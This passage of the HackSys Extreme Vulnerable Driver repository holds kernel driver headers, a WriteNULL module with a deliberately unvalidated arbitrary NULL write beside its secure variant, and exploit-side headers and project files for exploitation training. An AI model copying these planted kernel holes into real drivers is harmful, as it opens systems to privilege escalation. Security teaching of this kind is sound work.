25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UninitializedMemoryStack.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | uninitialized memory in Stack module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __UNINITIALIZED_MEMORY_STACK_H__
54 | #define __UNINITIALIZED_MEMORY_STACK_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
63 | typedef struct _UNINITIALIZED_MEMORY_STACK
64 | {
65 | ULONG Value;
66 | FunctionPointer Callback;
67 | ULONG Buffer[58];
68 | } UNINITIALIZED_MEMORY_STACK, *PUNINITIALIZED_MEMORY_STACK;
69 |
70 |
71 | //
72 | // Function Definitions
73 | //
74 |
75 | VOID
76 | UninitializedMemoryStackObjectCallback(
77 | VOID
78 | );
79 |
80 | NTSTATUS
81 | TriggerUninitializedMemoryStack(
82 | _In_ PVOID UserBuffer
83 | );
84 |
85 | #endif // !__UNINITIALIZED_MEMORY_STACK_H__
86 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/UseAfterFreeNonPagedPool.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UseAfterFreeNonPagedPool.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | use after free in NonPagedPool module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __USE_AFTER_FREE_NON_PAGED_POOL_H__
54 | #define __USE_AFTER_FREE_NON_PAGED_POOL_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
63 | typedef struct _USE_AFTER_FREE_NON_PAGED_POOL
64 | {
65 | FunctionPointer Callback;
66 | CHAR Buffer[0x54];
67 | } USE_AFTER_FREE_NON_PAGED_POOL, *PUSE_AFTER_FREE_NON_PAGED_POOL;
68 |
69 | typedef struct _FAKE_OBJECT_NON_PAGED_POOL
70 | {
71 | CHAR Buffer[0x54 + sizeof(PVOID)];
72 | } FAKE_OBJECT_NON_PAGED_POOL, *PFAKE_OBJECT_NON_PAGED_POOL;
73 |
74 |
75 | //
76 | // Function Definitions
77 | //
78 |
79 | VOID
80 | UaFObjectCallbackNonPagedPool(
81 | VOID
82 | );
83 |
84 | NTSTATUS
85 | UseUaFObjectNonPagedPool(
86 | VOID
87 | );
88 |
89 | NTSTATUS
90 | FreeUaFObjectNonPagedPool(
91 | VOID
92 | );
93 |
94 | NTSTATUS
95 | AllocateUaFObjectNonPagedPool(
96 | VOID
97 | );
98 |
99 | NTSTATUS
100 | AllocateFakeObjectNonPagedPool(
101 | _In_ PFAKE_OBJECT_NON_PAGED_POOL UserFakeObject
102 | );
103 |
104 | #endif // !__USE_AFTER_FREE_NON_PAGED_POOL_H__
105 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/UseAfterFreeNonPagedPoolNx.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UseAfterFreeNonPagedPoolNx.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | use after free in NonPagedPoolNx module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __USE_AFTER_FREE_NON_PAGED_POOL_NX_H__
54 | #define __USE_AFTER_FREE_NON_PAGED_POOL_NX_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
63 | typedef struct _USE_AFTER_FREE_NON_PAGED_POOL_NX
64 | {
65 | FunctionPointer Callback;
66 | CHAR Buffer[0x54];
67 | } USE_AFTER_FREE_NON_PAGED_POOL_NX, *PUSE_AFTER_FREE_NON_PAGED_POOL_NX;
68 |
69 | typedef struct _FAKE_OBJECT_NON_PAGED_POOL_NX
70 | {
71 | CHAR Buffer[0x54 + sizeof(PVOID)];
72 | } FAKE_OBJECT_NON_PAGED_POOL_NX, *PFAKE_OBJECT_NON_PAGED_POOL_NX;
73 |
74 |
75 | //
76 | // Function Definitions
77 | //
78 |
79 | VOID
80 | UaFObjectCallbackNonPagedPoolNx(
81 | VOID
82 | );
83 |
84 | NTSTATUS
85 | UseUaFObjectNonPagedPoolNx(
86 | VOID
87 | );
88 |
89 | NTSTATUS
90 | FreeUaFObjectNonPagedPoolNx(
91 | VOID
92 | );
93 |
94 | NTSTATUS
95 | AllocateUaFObjectNonPagedPoolNx(
96 | VOID
97 | );
98 |
99 | NTSTATUS
100 | AllocateFakeObjectNonPagedPoolNx(
101 | _In_ PFAKE_OBJECT_NON_PAGED_POOL_NX UserFakeObject
102 | );
103 |
104 | #endif // !__USE_AFTER_FREE_NON_PAGED_POOL_NX_H__
105 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/WriteNULL.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | WriteNULL.c
44 |
45 | Abstract:
46 | This module implements the functions to demonstrate
47 | Write NULL vulnerability.
48 |
49 | --*/
50 |
51 | #include "WriteNULL.h"
52 |
53 | #ifdef ALLOC_PRAGMA
54 | #pragma alloc_text(PAGE, TriggerWriteNULL)
55 | #pragma alloc_text(PAGE, WriteNULLIoctlHandler)
56 | #endif // ALLOC_PRAGMA
57 |
58 |
59 | ///
60 | /// Trigger the Write NULL Vulnerability
61 | ///
62 | /// The pointer to user mode buffer
63 | /// NTSTATUS
64 | NTSTATUS
65 | TriggerWriteNULL(
66 | _In_ PVOID UserBuffer
67 | )
68 | {
69 | NTSTATUS Status = STATUS_SUCCESS;
70 |
71 | PAGED_CODE();
72 |
73 | __try
74 | {
75 | //
76 | // Verify if the buffer resides in user mode
77 | //
78 |
79 | ProbeForRead(UserBuffer, sizeof(PVOID), (ULONG)__alignof(PVOID));
80 |
81 | //
82 | // Grab the user pointer to nullify to avoid race condition
83 | //
84 |
85 | PVOID UserPointerToNullify = *(PVOID *)UserBuffer;
86 |
87 | DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
88 | DbgPrint("[+] UserPointerToNullify: 0x%p\n", UserPointerToNullify);
89 |
90 | #ifdef SECURE
91 |
92 | //
93 | // Secure Note: This is secure because the developer is properly validating if
94 | // '*(UserBuffer)' resides in User mode by calling ProbeForWrite() routine before
95 | // performing the write operation
96 | //
97 |
98 | ProbeForWrite(UserPointerToNullify, sizeof(PVOID), (ULONG)__alignof(PVOID));
99 |
100 | *(PVOID *)UserPointerToNullify = NULL;
101 | #else
102 | DbgPrint("[+] Triggering Arbitrary NULL Write\n");
103 |
104 | //
105 | // Vulnerability Note: This is a vanilla Arbitrary NULL Write vulnerability
106 | // because the developer is writing NULL to the memory pointed by '*(UserBuffer)'
107 | // without properly validating if it resides in User mode
108 | //
109 |
110 | *(PVOID *)UserPointerToNullify = NULL;
111 | #endif
112 | }
113 | __except (EXCEPTION_EXECUTE_HANDLER)
114 | {
115 | Status = GetExceptionCode();
116 | DbgPrint("[-] Exception Code: 0x%X\n", Status);
117 | }
118 |
119 | return Status;
120 | }
121 |
122 |
123 | ///
124 | /// Write NULL Ioctl Handler
125 | ///
126 | /// The pointer to IRP
127 | /// The pointer to IO_STACK_LOCATION structure
128 | /// NTSTATUS
129 | NTSTATUS
130 | WriteNULLIoctlHandler(
131 | _In_ PIRP Irp,
132 | _In_ PIO_STACK_LOCATION IrpSp
133 | )
134 | {
135 | PVOID UserBuffer = NULL;
136 | NTSTATUS Status = STATUS_UNSUCCESSFUL;
137 |
138 | UNREFERENCED_PARAMETER(Irp);
139 | PAGED_CODE();
140 |
141 | UserBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;
142 |
143 | if (UserBuffer)
144 | {
145 | Status = TriggerWriteNULL(UserBuffer);
146 | }
147 |
148 | return Status;
149 | }
150 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/WriteNULL.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | WriteNULL.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | write NULL module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __WRITE_NULL_H__
54 | #define __WRITE_NULL_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Function Definitions
61 | //
62 |
63 | NTSTATUS
64 | TriggerWriteNULL(
65 | _In_ PVOID UserBuffer
66 | );
67 |
68 | #endif // !__WRITE_NULL_H__
69 |
--------------------------------------------------------------------------------
/Exploit/ArbitraryOverwrite.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | ArbitraryOverwrite.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Arbitrary Memory Overwrite Vulnerability
48 | implemented in HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __ARBITRARY_OVERWRITE_H__
53 | #define __ARBITRARY_OVERWRITE_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
59 | typedef struct _WRITE_WHAT_WHERE {
60 | PULONG_PTR What;
61 | PULONG_PTR Where;
62 | } WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;
63 |
64 | DWORD WINAPI ArbitraryOverwriteThread(LPVOID Parameter);
65 |
66 | #endif //__ARBITRARY_OVERWRITE_H__
67 |
--------------------------------------------------------------------------------
/Exploit/DoubleFetch.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | DoubleFetch.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Double Fetch Vulnerability implemented in
48 | HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __DOUBLE_FETCH_H__
53 | #define __DOUBLE_FETCH_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
59 | #pragma comment(lib, "psapi.lib")
60 |
61 | #define MAXIMUM_THREADS_ALLOWED 100
62 |
63 | typedef struct _DOUBLE_FETCH {
64 | PVOID Buffer;
65 | SIZE_T Size;
66 | } DOUBLE_FETCH, *PDOUBLE_FETCH;
67 |
68 | typedef struct _RACING_THREAD_PARAMETER {
69 | HANDLE DeviceHandle;
70 | PDOUBLE_FETCH DoubleFetch;
71 | } RACING_THREAD_PARAMETER, *PRACING_THREAD_PARAMETER;
72 |
73 | DWORD WINAPI DoubleFetchThread(LPVOID Parameter);
74 |
75 | #endif //__DOUBLE_FETCH_H__
76 |
--------------------------------------------------------------------------------
/Exploit/HackSysEVDExploit.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | HackSysEVDExploit.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | main exploit module handling the exploitation routines.
48 |
49 | --*/
50 |
51 | #ifndef __EXPLOIT_H__
52 | #define __EXPLOIT_H__
53 |
54 | #pragma once
55 |
56 | #include "arg.h"
57 | #include "Common.h"
58 |
59 | typedef enum _VULNERABILITY_TYPE {
60 | DoubleFetch,
61 | PoolOverflow,
62 | UseAfterFree,
63 | TypeConfusion,
64 | StackOverflow,
65 | IntegerOverflow,
66 | StackOverflowGS,
67 | ArbitraryOverwrite,
68 | NullPointerDereference,
69 | InsecureKernelFileAccess,
70 | UninitializedHeapVariable,
71 | UninitializedStackVariable,
72 | } VULNERABILITY_TYPE, *PVULNERABILITY_TYPE;
73 |
74 | typedef struct _EXPLOIT_VULNERABILITY {
75 | PTCHAR Command;
76 | VULNERABILITY_TYPE VulnerabilityType;
77 | } EXPLOIT_VULNERABILITY, *PEXPLOIT_VULNERABILITY;
78 |
79 | static VOID ShowUsage(PTCHAR Process);
80 | BOOL IsProcessHavingHigherPrivilege(LPCSTR TargetProcess);
81 | VOID Exploit(PEXPLOIT_VULNERABILITY ExploitVulnerability);
82 | VOID LaunchExploitThread(LPTHREAD_START_ROUTINE ExploitHandlerThread);
83 |
84 | #endif //__EXPLOIT_H__
85 |
--------------------------------------------------------------------------------
/Exploit/HackSysEVDExploit.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual Studio 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HackSysEVDExploit", "HackSysEVDExploit.vcxproj", "{A432D8CD-BCEA-49B5-81EE-20B926D7421A}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Debug|Win32.Build.0 = Debug|Win32
14 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Release|Win32.ActiveCfg = Release|Win32
15 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/Exploit/HackSysEVDExploit.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 |
14 | {A432D8CD-BCEA-49B5-81EE-20B926D7421A}
15 | HackSysEVDExploit
16 | HackSysEVDExploit
17 |
18 |
19 |
20 | Application
21 | true
22 | MultiByte
23 |
24 |
25 | Application
26 | false
27 | true
28 | MultiByte
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 | Level3
44 | Disabled
45 |
46 |
47 | true
48 |
49 |
50 |
51 |
